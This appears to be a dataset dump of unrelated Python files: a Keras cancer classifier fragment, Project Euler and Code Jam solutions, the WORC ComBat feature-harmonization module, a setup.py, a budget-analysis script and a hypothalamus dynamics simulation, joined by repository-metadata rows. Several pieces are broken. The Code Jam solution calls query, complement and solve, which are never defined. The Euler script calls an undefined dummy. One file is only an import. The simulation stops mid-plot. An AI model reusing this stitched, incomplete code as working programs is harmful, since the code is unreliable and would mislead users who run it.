detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform'))
# Adding the output layer
detectar_cancer.add(Dense(units=1,activation='sigmoid'))
# Compile the network
# compile(gradient descent method, error function - e.g. MSE, network accuracy metric)
# clipvalue -> clips gradient values to the range [-0.5, 0.5]
# lr = step size, decay -> step-size reduction over training
otimizar = keras.optimizers.Adam(lr=0.001,decay=0.0001)
# In this case clipvalue hurt performance
#otimizar = keras.optimizers.Adam(lr=0.004,decay=0.0001,clipvalue=0.5)
detectar_cancer.compile(otimizar,loss='binary_crossentropy',metrics=['binary_accuracy'])
#detectar_cancer.compile(optimizer='adam',loss='binary_crossentropy',metrics=['binary_accuracy'])
# Train the network - the error is computed over batches of 10 samples,
# then the weights are updated (stochastic gradient descent every 10 samples)
detectar_cancer.fit(entrada_treinar,esperado_treinar,batch_size=10,epochs=100)
# Getting the weights
pesosCamadaEntrada = detectar_cancer.layers[0].get_weights()
pesosCamadaOculta = detectar_cancer.layers[1].get_weights()
pesosCamadaSaida = detectar_cancer.layers[2].get_weights()
# Running the validation test
# returns the predicted probability for each sample
validar = detectar_cancer.predict(entrada_teste)
# converting to true or false (1 or 0) for comparison:
# true if greater than 0.5, false otherwise
validar = (validar > 0.5)
# compares the two vectors and computes the network's accuracy
# on the held-out test set
precisao = accuracy_score(esperado_teste,validar)
# Confusion matrix of the network's predictions
acertos = confusion_matrix(esperado_teste,validar)
# Another way to get the results:
# evaluate() returns the loss and the accuracy
resultado = detectar_cancer.evaluate(entrada_teste, esperado_teste)
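# --- Illustrative check (added for clarity, not part of the original script) ---
# The accuracy computed above can also be recovered from the confusion matrix:
# (true negatives + true positives) divided by the total number of test samples.
precisao_via_matriz = float(acertos[0, 0] + acertos[1, 1]) / acertos.sum()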
| 33.216867 | 114 | 0.791077 |
5f50dd9219cff3c1253c4849dd5381638d312cc3 | 1,214 | py | Python | py/py_0736_paths_to_equality.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0736_paths_to_equality.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0736_paths_to_equality.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | # Solution of;
# Project Euler Problem 736: Paths to Equality
# https://projecteuler.net/problem=736
#
# Define two functions on lattice points:$r(x,y) = (x+1,2y)$$s(x,y) =
# (2x,y+1)$A path to equality of length $n$ for a pair $(a,b)$ is a sequence
# $\Big((a_1,b_1),(a_2,b_2),\ldots,(a_n,b_n)\Big)$, where:$(a_1,b_1) =
# (a,b)$$(a_k,b_k) = r(a_{k-1},b_{k-1})$ or $(a_k,b_k) = s(a_{k-1},b_{k-1})$
# for $k > 1$$a_k \ne b_k$ for $k < n$$a_n = b_n$$a_n = b_n$ is called the
# final value. For example,$(45,90)\xrightarrow{r}
# (46,180)\xrightarrow{s}(92,181)\xrightarrow{s}(184,182)\xrightarrow{s}(368,183)\xrightarrow{s}(736,184)\xrightarrow{r}$$(737,368)\xrightarrow{s}(1474,369)\xrightarrow{r}(1475,738)\xrightarrow{r}(1476,1476)$This
# is a path to equality for $(45,90)$ and is of length 10 with final value
# 1476. There is no path to equality of $(45,90)$ with smaller length. Find
# the unique path to equality for $(45,90)$ with smallest odd length. Enter
# the final value as your answer.
#
# by lcsm29 http://github.com/lcsm29/project-euler
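# Illustration (added, not part of the original solution): the two lattice maps
# from the problem statement, written out directly for reference.
# r = lambda x, y: (x + 1, 2 * y)
# s = lambda x, y: (2 * x, y + 1)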
import timed
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 736
timed.caller(dummy, n, i, prob_id)
| 40.466667 | 213 | 0.651565 |
5f548523f9dcf1f62a0e2fe0f345f22d699939d1 | 1,728 | py | Python | codejam/2020-qualification/d.py | Ashindustry007/competitive-programming | 2eabd3975c029d235abb7854569593d334acae2f | [
"WTFPL"
] | 506 | 2018-08-22T10:30:38.000Z | 2022-03-31T10:01:49.000Z | codejam/2020-qualification/d.py | Ashindustry007/competitive-programming | 2eabd3975c029d235abb7854569593d334acae2f | [
"WTFPL"
] | 13 | 2019-08-07T18:31:18.000Z | 2020-12-15T21:54:41.000Z | codejam/2020-qualification/d.py | Ashindustry007/competitive-programming | 2eabd3975c029d235abb7854569593d334acae2f | [
"WTFPL"
] | 234 | 2018-08-06T17:11:41.000Z | 2022-03-26T10:56:42.000Z | #!/usr/bin/env python3
# https://codingcompetitions.withgoogle.com/codejam/round/000000000019fd27/0000000000209a9e
t, b = map(int, input().split())
for _ in range(t):
xs = [None] * b
q, k, k1, k2 = 0, 0, None, None
while True:
if q > 0 and q % 10 == 0:
if k1 is not None and k2 is not None:
v1 = query(k1+1)
v2 = query(k2+1)
if xs[k1] == v1 and xs[k2] == v2:
pass
elif xs[k1] != v1 and xs[k2] != v2:
complement()
elif xs[k1] != v1:
xs = xs[::-1]
complement()
else:
xs = xs[::-1]
elif k1 is not None:
v1 = query(k1+1)
v1 = query(k1+1)
if xs[k1] != v1:
complement()
else:
v2 = query(k2+1)
v2 = query(k2+1)
if xs[k2] != v2:
xs = xs[::-1]
else:
v1 = query(k+1)
v2 = query(b-k)
xs[k] = v1
xs[b-k-1] = v2
if v1 == v2 and k1 is None:
k1 = k
elif v1 != v2 and k2 is None:
k2 = k
k += 1
if k*2 == b:
solve()
break
| 27 | 91 | 0.358218 |
5f587bf36e711ee18aa81e26269a6338ac9328eb | 1,388 | py | Python | Stephanie/updater.py | JeremyARussell/stephanie-va | acc894fa69b4e5559308067d525f71f951ecc258 | [
"MIT"
] | 866 | 2017-06-10T19:25:28.000Z | 2022-01-06T18:29:36.000Z | Stephanie/updater.py | JeremyARussell/stephanie-va | acc894fa69b4e5559308067d525f71f951ecc258 | [
"MIT"
] | 54 | 2017-06-11T06:41:19.000Z | 2022-01-10T23:06:03.000Z | Stephanie/updater.py | JeremyARussell/stephanie-va | acc894fa69b4e5559308067d525f71f951ecc258 | [
"MIT"
] | 167 | 2017-06-10T19:32:54.000Z | 2022-01-03T07:01:39.000Z | import requests
from Stephanie.configurer import config
| 34.7 | 142 | 0.730548 |
5f591fe59a581e7f936f818cedb0f094b131b698 | 24,533 | py | Python | WORC/featureprocessing/ComBat.py | MStarmans91/WORC | b6b8fc2ccb7d443a69b5ca20b1d6efb65b3f0fc7 | [
"ECL-2.0",
"Apache-2.0"
] | 47 | 2018-01-28T14:08:15.000Z | 2022-03-24T16:10:07.000Z | WORC/featureprocessing/ComBat.py | JZK00/WORC | 14e8099835eccb35d49b52b97c0be64ecca3809c | [
"ECL-2.0",
"Apache-2.0"
] | 13 | 2018-08-28T13:32:57.000Z | 2020-10-26T16:35:59.000Z | WORC/featureprocessing/ComBat.py | JZK00/WORC | 14e8099835eccb35d49b52b97c0be64ecca3809c | [
"ECL-2.0",
"Apache-2.0"
] | 16 | 2017-11-13T10:53:36.000Z | 2022-03-18T17:02:04.000Z | #!/usr/bin/env python
# Copyright 2020 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import scipy.io as sio
import WORC.IOparser.file_io as wio
import WORC.IOparser.config_io_combat as cio
import numpy as np
import random
import pandas as pd
from WORC.addexceptions import WORCValueError, WORCKeyError
import tempfile
from sys import platform
from WORC.featureprocessing.VarianceThreshold import selfeat_variance
from sklearn.preprocessing import StandardScaler
from neuroCombat import neuroCombat
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from WORC.featureprocessing.Imputer import Imputer
def ComBat(features_train_in, labels_train, config, features_train_out,
features_test_in=None, labels_test=None, features_test_out=None,
VarianceThreshold=True, scaler=False, logarithmic=False):
"""
Apply ComBat feature harmonization.
Based on: https://github.com/Jfortin1/ComBatHarmonization
"""
# Load the config
print('############################################################')
print('# Initializing ComBat. #')
print('############################################################\n')
config = cio.load_config(config)
excluded_features = config['ComBat']['excluded_features']
# If mod, than also load moderating labels
if config['ComBat']['mod'][0] == '[]':
label_names = config['ComBat']['batch']
else:
label_names = config['ComBat']['batch'] + config['ComBat']['mod']
# Load the features for both training and testing, match with batch and mod parameters
label_data_train, image_features_train =\
wio.load_features(features_train_in, patientinfo=labels_train,
label_type=label_names)
feature_labels = image_features_train[0][1]
image_features_train = [i[0] for i in image_features_train]
label_data_train['patient_IDs'] = list(label_data_train['patient_IDs'])
# Exclude features
if excluded_features:
print(f'\t Excluding features containing: {excluded_features}')
# Determine indices of excluded features
included_feature_indices = []
excluded_feature_indices = []
for fnum, i in enumerate(feature_labels):
if not any(e in i for e in excluded_features):
included_feature_indices.append(fnum)
else:
excluded_feature_indices.append(fnum)
# Actually exclude the features
image_features_train_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_train]
feature_labels_combat = np.asarray(feature_labels)[included_feature_indices].tolist()
image_features_train_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_train]
feature_labels_noncombat = np.asarray(feature_labels)[excluded_feature_indices].tolist()
else:
image_features_train_combat = image_features_train
feature_labels_combat = feature_labels.tolist()
image_features_train_noncombat = []
feature_labels_noncombat = []
# Detect NaNs, otherwise first feature imputation is required
if any(np.isnan(a) for a in np.asarray(image_features_train_combat).flatten()):
print('\t [WARNING] NaNs detected, applying median imputation')
imputer = Imputer(missing_values=np.nan, strategy='median')
imputer.fit(image_features_train_combat)
image_features_train_combat = imputer.transform(image_features_train_combat)
else:
imputer = None
# Apply a scaler to the features
if scaler:
print('\t Fitting scaler on dataset.')
scaler = StandardScaler().fit(image_features_train_combat)
image_features_train_combat = scaler.transform(image_features_train_combat)
# Remove features with a constant value
if VarianceThreshold:
print(f'\t Applying variance threshold on dataset.')
image_features_train_combat, feature_labels_combat, VarSel =\
selfeat_variance(image_features_train_combat, np.asarray([feature_labels_combat]))
feature_labels_combat = feature_labels_combat[0].tolist()
if features_test_in:
label_data_test, image_features_test =\
wio.load_features(features_test_in, patientinfo=labels_test,
label_type=label_names)
image_features_test = [i[0] for i in image_features_test]
label_data_test['patient_IDs'] = list(label_data_test['patient_IDs'])
if excluded_features:
image_features_test_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_test]
image_features_test_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_test]
else:
image_features_test_combat = image_features_test
image_features_test_noncombat = []
# Apply imputation if required
if imputer is not None:
image_features_test_combat = imputer.transform(image_features_test_combat)
# Apply a scaler to the features
if scaler:
image_features_test_combat = scaler.transform(image_features_test_combat)
# Remove features with a constant value
if VarianceThreshold:
image_features_test_combat = VarSel.transform(image_features_test_combat)
all_features = image_features_train_combat.tolist() + image_features_test_combat.tolist()
all_labels = list()
for i in range(label_data_train['label'].shape[0]):
all_labels.append(label_data_train['label'][i, :, 0].tolist() + label_data_test['label'][i, :, 0].tolist())
all_labels = np.asarray(all_labels)
else:
all_features = image_features_train_combat.tolist()
all_labels = label_data_train['label']
# Convert data to a single array
all_features_matrix = np.asarray(all_features)
all_labels = np.squeeze(all_labels)
# Apply logarithm if required
if logarithmic:
print('\t Taking log10 of features before applying ComBat.')
all_features_matrix = np.log10(all_features_matrix)
# Convert all_labels to dictionary
if len(all_labels.shape) == 1:
# No mod variables
all_labels = {label_data_train['label_name'][0]: all_labels}
else:
all_labels = {k: v for k, v in zip(label_data_train['label_name'], all_labels)}
# Split labels in batch and moderation labels
bat = config['ComBat']['batch']
mod = config['ComBat']['mod']
print(f'\t Using batch variable {bat}, mod variables {mod}.')
batch = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['batch']]
batch = batch[0]
if config['ComBat']['mod'][0] == '[]':
mod = None
else:
mod = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['mod']]
# Set parameters for output files
parameters = {'batch': config['ComBat']['batch'],
'mod': config['ComBat']['mod'],
'par': config['ComBat']['par']}
name = 'Image features: ComBat corrected'
panda_labels = ['parameters',
'patient',
'feature_values',
'feature_labels']
feature_labels = feature_labels_combat + feature_labels_noncombat
# Convert all inputs to arrays with right shape
all_features_matrix = np.transpose(all_features_matrix)
if mod is not None:
mod = np.transpose(np.asarray(mod))
# Patients identified with batch -1.0 should be skipped
skipname = 'Image features: ComBat skipped'
ntrain = len(image_features_train_combat)
ndel = 0
print(features_test_out)
for bnum, b in enumerate(batch):
bnum -= ndel
if b == -1.0:
if bnum < ntrain - ndel:
# Training patient
print('train')
pid = label_data_train['patient_IDs'][bnum]
out = features_train_out[bnum]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_train_noncombat[bnum])
# Delete patient for later processing
del label_data_train['patient_IDs'][bnum]
del image_features_train_noncombat[bnum]
del features_train_out[bnum]
image_features_train_combat = np.delete(image_features_train_combat, bnum, 0)
else:
# Test patient
print('test')
pid = label_data_test['patient_IDs'][bnum - ntrain]
out = features_test_out[bnum - ntrain]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_test_noncombat[bnum - ntrain])
# Delete patient for later processing
del label_data_test['patient_IDs'][bnum - ntrain]
del image_features_test_noncombat[bnum - ntrain]
del features_test_out[bnum - ntrain]
image_features_test_combat = np.delete(image_features_test_combat, bnum - ntrain, 0)
# Delete some other variables for later processing
all_features_matrix = np.delete(all_features_matrix, bnum, 1)
if mod is not None:
mod = np.delete(mod, bnum, 0)
batch = np.delete(batch, bnum, 0)
# Notify user
print(f'[WARNING] Skipping patient {pid} as batch variable is -1.0.')
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=skipname
)
print(f'\t Saving image features to: {out}.')
panda_data.to_hdf(out, 'image_features')
ndel += 1
print(features_test_out)
# Run ComBat in Matlab
if config['ComBat']['language'] == 'matlab':
print('\t Executing ComBat through Matlab')
data_harmonized = ComBatMatlab(dat=all_features_matrix,
batch=batch,
command=config['ComBat']['matlab'],
mod=mod,
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
elif config['ComBat']['language'] == 'python':
print('\t Executing ComBat through neuroComBat in Python')
data_harmonized = ComBatPython(dat=all_features_matrix,
batch=batch,
mod=mod,
eb=config['ComBat']['eb'],
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
else:
raise WORCKeyError(f"Language {config['ComBat']['language']} unknown.")
# Convert values back if logarithm was used
if logarithmic:
data_harmonized = 10 ** data_harmonized
# Convert again to train hdf5 files
feature_values_train_combat = [data_harmonized[:, i] for i in range(len(image_features_train_combat))]
for fnum, i_feat in enumerate(feature_values_train_combat):
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_train_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_train['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_train_out[fnum]}.')
panda_data.to_hdf(features_train_out[fnum], 'image_features')
# Repeat for testing if required
if features_test_in:
print(len(image_features_test_combat))
print(data_harmonized.shape[1])
feature_values_test_combat = [data_harmonized[:, i] for i in range(data_harmonized.shape[1] - len(image_features_test_combat), data_harmonized.shape[1])]
for fnum, i_feat in enumerate(feature_values_test_combat):
print(fnum)
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_test_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_test['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_test_out[fnum]}.')
panda_data.to_hdf(features_test_out[fnum], 'image_features')
def ComBatPython(dat, batch, mod=None, par=1,
eb=1, per_feature=False, plotting=False):
"""
Run the ComBat Function python script.
par = 0 is non-parametric.
"""
# convert inputs to neuroCombat format.
covars = dict()
categorical_cols = list()
covars['batch'] = batch
if mod is not None:
for i_mod in range(mod.shape[1]):
label = f'mod_{i_mod}'
covars[label] = [m for m in mod[:, i_mod]]
categorical_cols.append(label)
covars = pd.DataFrame(covars)
batch_col = 'batch'
if par == 0:
parametric = False
elif par == 1:
parametric = True
else:
raise WORCValueError(f'Par should be 0 or 1, now {par}.')
if eb == 0:
eb = False
elif eb == 1:
eb = True
else:
raise WORCValueError(f'eb should be 0 or 1, now {eb}.')
if per_feature == 0:
per_feature = False
elif per_feature == 1:
per_feature = True
else:
raise WORCValueError(f'per_feature should be 0 or 1, now {per_feature}.')
# execute ComBat
if not per_feature:
data_harmonized = neuroCombat(dat=dat, covars=covars, batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
elif per_feature:
print('\t Executing ComBat per feature.')
data_harmonized = np.zeros(dat.shape)
# Shape: (features, samples)
for i in range(dat.shape[0]):
if eb:
# Copy feature + random noise
random_feature = np.random.rand(dat[i, :].shape[0])
feat_temp = np.asarray([dat[i, :], dat[i, :] + random_feature])
else:
# Just use the single feature
feat_temp = np.asarray([dat[i, :]])
feat_temp = neuroCombat(dat=feat_temp, covars=covars,
batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
data_harmonized[i, :] = feat_temp[0, :]
if plotting:
feat1 = dat[i, :]
feat1_harm = data_harmonized[i, :]
print(len(feat1))
feat1_b1 = [f for f, b in zip(feat1, batch[0]) if b == 1.0]
feat1_b2 = [f for f, b in zip(feat1, batch[0]) if b == 2.0]
print(len(feat1_b1))
print(len(feat1_b2))
feat1_harm_b1 = [f for f, b in zip(feat1_harm, batch[0]) if b == 1.0]
feat1_harm_b2 = [f for f, b in zip(feat1_harm, batch[0]) if b == 2.0]
plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((len(feat1_b1))), feat1_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_b2, color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((len(feat1_b1))), feat1_harm_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_harm_b2, color='blue')
plt.title('After Combat')
plt.show()
else:
raise WORCValueError(f'per_feature should be False or True, now {per_feature}.')
return data_harmonized
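# --- Illustrative usage (added for clarity, not part of the original module) ---
# Minimal sketch of calling ComBatPython on synthetic data: `dat` is laid out as
# (features, samples), `batch` holds one batch label per sample and `mod` is an
# optional (samples, covariates) array. Shapes and values here are hypothetical.
def _combat_python_example():
    dat = np.random.rand(5, 20)                      # 5 features, 20 samples
    batch = np.asarray([1] * 10 + [2] * 10)          # two scanners or sites
    mod = np.random.randint(30, 80, size=(20, 1))    # e.g. age as a moderation variable
    return ComBatPython(dat=dat, batch=batch, mod=mod, par=1, eb=1)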
def Synthetictest(n_patients=50, n_features=10, par=1, eb=1,
per_feature=False, difscale=False, logarithmic=False,
oddpatient=True, oddfeat=True, samefeat=True):
"""Test for ComBat with Synthetic data."""
features = np.zeros((n_features, n_patients))
batch = list()
# First batch: Gaussian with loc 0, scale 1
for i in range(0, int(n_patients/2)):
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features)]
if i == 1 and oddpatient:
feat_temp = [np.random.normal(loc=10.0, scale=1.0) for i in range(n_features)]
elif oddfeat:
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(1)
# Get directions for features
directions = list()
for i in range(n_features):
direction = random.random()
if direction > 0.5:
directions.append(1.0)
else:
directions.append(-1.0)
# First batch: Gaussian with loc 5, scale 1
for i in range(int(n_patients/2), n_patients):
feat_temp = [np.random.normal(loc=direction*5.0, scale=1.0) for i in range(n_features)]
if oddfeat:
feat_temp = [np.random.normal(loc=5.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if difscale:
feat_temp = [f + 1000 for f in feat_temp]
feat_temp = np.multiply(feat_temp, directions)
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(2)
# Create mod var
mod = [[np.random.randint(30, 100) for i in range(n_patients)]]
# Apply ComBat
batch = np.asarray([batch])
mod = np.transpose(np.asarray(mod))
if logarithmic:
minfeat = np.min(features)
features = np.log10(features + np.abs(minfeat) + 1E-100)
data_harmonized = ComBatPython(dat=features, batch=batch, mod=mod, par=par,
eb=eb, per_feature=per_feature)
if logarithmic:
data_harmonized = 10 ** data_harmonized - np.abs(minfeat)
for i in range(n_features):
f = plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((int(n_patients/2))), features[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, features[i, int(n_patients/2):], color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((int(n_patients/2))), data_harmonized[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, data_harmonized[i, int(n_patients/2):], color='blue')
plt.title('After Combat')
plt.show()
f.savefig(f'combat_par{par}_eb{eb}_perfeat{per_feature}_feat{i}.png')
# Logarithmic: not useful, as we have negative numbers and (almost) zeros,
# so ComBat gives unusable results.
# Same feature twice with eb and par: NaNs
def ComBatMatlab(dat, batch, command, mod=None, par=1, per_feature='true'):
"""
Run the ComBat Function Matlab script.
par = 0 is non-parametric.
"""
# Mod: default argument is empty list
if mod is None:
mod = []
# TODO: Add check whether matlab executable is found
# Save the features in a .mat MatLab Compatible format
# NOTE: Should change this_folder to a proper temporary directory
this_folder = os.path.dirname(os.path.realpath(__file__))
tempdir = tempfile.gettempdir()
tempfile_in = os.path.join(tempdir, 'combat_input.mat')
tempfile_out = os.path.join(tempdir, 'combat_output.mat')
ComBatFolder = os.path.join(os.path.dirname(this_folder),
'external',
'ComBatHarmonization',
'Matlab',
'scripts')
dict = {'output': tempfile_out,
'ComBatFolder': ComBatFolder,
'datvar': dat,
'batchvar': batch,
'modvar': mod,
'parvar': par,
'per_feature': per_feature
}
sio.savemat(tempfile_in, dict)
# Make sure there is no tempfile out from the previous run
if os.path.exists(tempfile_out):
os.remove(tempfile_out)
# Run ComBat
currentdir = os.getcwd()
if platform == "linux" or platform == "linux2":
commandseparator = ' ; '
elif platform == "win32":
commandseparator = ' & '
# BIGR Cluster: /cm/shared/apps/matlab/R2015b/bin/matlab
regcommand = ('cd "' + this_folder + '"' + commandseparator +
'"' + command + '" -nodesktop -nosplash -nojvm -r "combatmatlab(' + "'" + str(tempfile_in) + "'" + ')"' +
commandseparator +
'cd "' + currentdir + '"')
print(f'Executing ComBat in Matlab through command: {regcommand}.')
proc = subprocess.Popen(regcommand,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
proc.wait()
stdout_value, stderr_value = proc.communicate()
# BUG: Waiting does not work, just wait for output to arrive, either with
# the actual output or an error message
succes = False
while succes is False:
if os.path.exists(tempfile_out):
try:
mat_dict = sio.loadmat(tempfile_out)
try:
data_harmonized = mat_dict['data_harmonized']
succes = True
except KeyError:
try:
message = mat_dict['message']
raise WORCValueError(f'Error in Matlab ComBat execution: {message}.')
except KeyError:
pass
except (sio.matlab.miobase.MatReadError, ValueError):
pass
# Check if expected output file exists
if not os.path.exists(tempfile_out):
raise WORCValueError(f'Error in Matlab ComBat execution: command: {regcommand}, stdout: {stdout_value}, stderr: {stderr_value}')
# Read the output from ComBat
mat_dict = sio.loadmat(tempfile_out)
data_harmonized = mat_dict['data_harmonized']
data_harmonized = np.transpose(data_harmonized)
# Remove temporary files
os.remove(tempfile_out)
os.remove(tempfile_in)
return data_harmonized
| 40.684909 | 161 | 0.604329 |
5f59e320e469d3924b3247fe49f94eea11acee62 | 727 | py | Python | setup.py | mariocesar/pg-worker | d79c6daa8825226c754330c21150e4e416b09005 | [
"MIT"
] | 1 | 2020-06-03T21:21:03.000Z | 2020-06-03T21:21:03.000Z | setup.py | mariocesar/pg-worker | d79c6daa8825226c754330c21150e4e416b09005 | [
"MIT"
] | null | null | null | setup.py | mariocesar/pg-worker | d79c6daa8825226c754330c21150e4e416b09005 | [
"MIT"
] | null | null | null | import os
import sys
from setuptools import setup, find_packages
ROOT = os.path.realpath(os.path.join(os.path.dirname(
sys.modules['__main__'].__file__)))
sys.path.insert(0, os.path.join(ROOT, 'src'))
setup(
name='pgworker',
packages=find_packages('src'),
package_dir={'': 'src'},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
entry_points={
'console_scripts': [
'pgworker = pgworker.runner:main'
]
}
)
| 24.233333 | 53 | 0.603851 |
5f5a0eafce7a5f076591e84cd9440a10e1d4e795 | 2,040 | py | Python | PyBank/main.py | gentikosumi/python-challenge | e6532bf1033f5272616d4f8a1cf623bbafe1a1c2 | [
"ADSL"
] | null | null | null | PyBank/main.py | gentikosumi/python-challenge | e6532bf1033f5272616d4f8a1cf623bbafe1a1c2 | [
"ADSL"
] | null | null | null | PyBank/main.py | gentikosumi/python-challenge | e6532bf1033f5272616d4f8a1cf623bbafe1a1c2 | [
"ADSL"
] | null | null | null | import os
import csv
path = '/Users/kevinkosumi12345/Genti/python-challenge/PyBank/Resources/budget_data.csv'
budget_csv=os.path.join("../Resources", "budget_data.csv")
csvfile = open(path, newline="")
reader=csv.reader(csvfile, delimiter=",")
header = next(reader)
# print(header)
# the columns we have to convert into lists
# Create first 2 empty lists according 2 columns
date = []
profloss = []
# print("Financial Anaysis")
# print("-----------------------------------------")
for row in reader:
date.append(row[0])
profloss.append(int(row[1]))
# getting the total of Profit/Losses
total_profloss='Total Profit/Losses: $ ' + str(sum(profloss))
# print(total_profloss)
# getting the number of months in entire period
monthcount = 'Total months: ' + str(len(date))
# print(monthcount)
# before finding the average of change in Profit/Losses, first we have to find the total change
Total_change_profloss = 0
for x in range(1, len(profloss)):
Total_change_profloss = Total_change_profloss + (profloss[x] - profloss[x-1])
# finding the average of change in Profit/Losses
avg_change_profloss = 'Average change in Profit/Loss: ' + str(round(Total_change_profloss/(len(profloss)-1),2))
# print(avg_change_profloss)
# getting the max value of data in Profit/Losses which is the Greatest Increase of Profit/Losses
maxVal = 'Greatest increase of Profit/Losses: ' + ' on ' + str(date[profloss.index(max(profloss))]) + ' $ ' + str(max(profloss))
# print(maxVal)
# the min Value of date in Profit/Losses which is the Greatest Decrease
minVal = 'Greatest decrease of Profit/Losses: ' + ' on ' + str(date[profloss.index(min(profloss))]) + ' $ ' + str(min(profloss))
# print(minVal)
DataBudget = open('analisis.csv' , 'w')
DataBudget.write('Financial Analysis\n')
DataBudget.write('------------------------\n')
DataBudget.write(monthcount + '\n')
DataBudget.write(total_profloss + '\n')
DataBudget.write(avg_change_profloss + '\n')
DataBudget.write(maxVal + '\n')
DataBudget.write(minVal + '\n')
DataBudget.close() | 30.909091 | 129 | 0.702451 |
5f5b2c35892025ff370debbb01a9bff69a798ad0 | 1,516 | py | Python | models/python/hypothalamus/dynamical/old/simple.py | ABRG-Models/MammalBot | 0b153232b94197c7a65156c1c3451ab2b9f725ae | [
"MIT"
] | null | null | null | models/python/hypothalamus/dynamical/old/simple.py | ABRG-Models/MammalBot | 0b153232b94197c7a65156c1c3451ab2b9f725ae | [
"MIT"
] | null | null | null | models/python/hypothalamus/dynamical/old/simple.py | ABRG-Models/MammalBot | 0b153232b94197c7a65156c1c3451ab2b9f725ae | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
T = 30000
# v = 0.02906
# v = 0.617085
v = 0.99
h = 0.01
a = 0.5
b = 0.5
epsilon = 0.05
c = 0.4
eta = lambda rho: np.exp(-(rho)**2/(2*c**2))
nrho = lambda rho, v: -2.0*(rho**3 + (rho-1.0)*v/2.0 - rho)/(rho + 1.0)
nu = lambda rho: (b - eta(rho+1))/a
u = np.zeros(T)
rho = np.zeros(T)
time = np.zeros(T)
# Maps
f = lambda rho, u, v: -rho**3 - (rho + 1.0)*u/2.0 - (rho - 1.0)*v/2.0 + rho
g1 = lambda rho, u, v: epsilon*(b - a*u - eta(rho+1))
# Initial conditions
u[0] = 0.0
rho[0] = -0.0
for i in range(T-1):
rho[i+1] = rho[i] + h*f(rho[i], u[i], v)
u[i+1] = u[i] + h*g1(rho[i], u[i], v)
time[i+1] = time[i] + h
fig, ax = plt.subplots(1, 2)
# X, Y = np.meshgrid(np.arange(-0.6, 0.6, 0.1), np.arange(-0.2, 1.0, .1))
# U = f(X, Y, v)/epsilon #rho
# V = g1(X, Y, v)/epsilon #u
# q = ax[0].quiver(X, Y, U, V, units='x', pivot='tip')#, width=0.022, scale=1 / 0.40)
rhos = np.linspace(-0.99, 1, 100)
ax[0].plot( rhos, nrho(rhos, v), color = [0.8, 0.5, 0.5], linewidth = 3.0)
